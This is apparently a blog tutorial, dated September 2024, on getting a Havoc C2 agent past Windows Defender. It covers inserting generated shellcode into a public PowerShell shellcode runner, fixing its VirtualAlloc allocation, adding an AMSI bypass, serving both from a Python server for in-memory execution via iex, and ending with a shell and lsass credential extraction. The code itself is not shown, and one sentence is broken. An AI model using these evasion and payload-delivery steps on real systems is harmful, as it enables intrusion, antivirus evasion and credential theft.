How to run Havoc agent through Windows Defender (2024)
Hi all! Today I will show you a method to bypass the latest version of Windows Defender using Havoc Demons as of September 2024.
We will use offensive powershell: find a shellcode runner in PowerShell and combine it with a working AMSI bypass to execute it in memory.
I will use the following shellcode runner in PowerShell: https://github.com/dievus/PowerShellRunner/blob/main/runner.ps1
Now I will generate the shellcode for agent Havoc, which will be saved to a file with a .bin extension.
Now we can use script in Python 2 to convert our bin file into shellcode, which can be inserted into the runner.ps1 script.
Now we can copy this shellcode into the $buf variable in the runner.ps1 script.
However, if we try to run our shellcode this way, errors may occur. This is most likely due to the fact that not enough memory has been allocated for the execution. We need to edit the $cucumbers variable, which calls the Windows API VirtualAlloc function.
According to the documentation, the second parameter of the function determines the size of the allocated memory.
So we'll move the $cucumbers variable right after our shellcode and change the second parameter of the VirtualAlloc function to match the size of our shellcode. This ensures that enough memory is allocated for the code to execute successfully.
I then test this with antivirus protection disabled on a Windows machine and make sure it works.
However, this is not enough to avoid detection by Defender.
I'll try to use recent Antimalware Scan Interface (AMSI) bypassso that we can complete our .
It worked! Now let's set up a Python server from which we will try to download our AMSI bypass along with our shellcode runner.
Note: You may need to obfuscate iex commands as they may be blocked by Windows Defender.
And now we managed to get a shell in Havoc!
And we can even execute .NET binaries without problems
or extract lsass.
